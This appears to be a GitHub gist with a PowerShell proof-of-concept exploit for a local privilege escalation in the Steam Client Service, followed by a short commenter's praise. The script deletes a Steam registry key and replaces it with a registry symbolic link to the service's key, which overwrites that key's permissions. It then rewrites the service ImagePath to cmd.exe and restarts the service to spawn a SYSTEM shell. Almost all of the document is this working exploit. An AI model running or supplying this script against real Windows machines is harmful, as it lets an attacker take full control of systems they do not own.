| Write-Host "[*] Installing NTObjectManager..." | |
| install-module NTObjectManager -Scope CurrentUser -Force | |
| import-module NTObjectManager | |
| Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" | |
| Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" | |
| Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" | |
| [NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service") | |
| Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service" | |
| Get-Service "Steam Client Service" | Restart-Service | |
| Write-Host "[*] Sleeping 5 seconds" | |
| Start-Sleep 5 | |
| Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten" | |
| Write-Host "[*] Modifying the binPath on the Steam Client Service..." | |
| Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe" | |
| Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it" | |
| Get-Service "Steam Client Service" | Restart-Service | |
| Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM" | |
This comment has been minimized.
This comment has been minimized.
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.